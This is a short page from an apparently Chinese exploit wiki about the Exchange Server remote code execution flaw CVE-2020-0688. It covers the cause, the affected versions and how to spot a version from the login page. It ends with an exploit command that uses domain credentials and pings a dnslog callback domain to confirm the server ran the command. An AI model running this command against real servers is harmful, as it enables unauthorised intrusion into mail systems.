menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right Exchange chevron_right RCE-需要域用户(CVE-2020-0688)
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    漏洞概述

    由于Exchange服务器在安装时没有正确地创建唯一的加密密钥所造成的

    影响范围

    #需要域用户登陆
2010、2013、2016、2019

    对于如何识别版本可以用如下的方式

    在登录界面查看网页源代码,15.1.225就是版本,之后在Mircosoft网站上根据版本号就可以直接查询

    找到<link rel="shortcut icon" href="/owa/auth/15.1.225/themes/resources/favicon.ico" type="image/x-icon">

    EXP

    python CVE-2020-0688.py -s https://ip/owa/ -u user -p pass -c "ping test.ph4nxq.dnslog.cn"

    @Ridter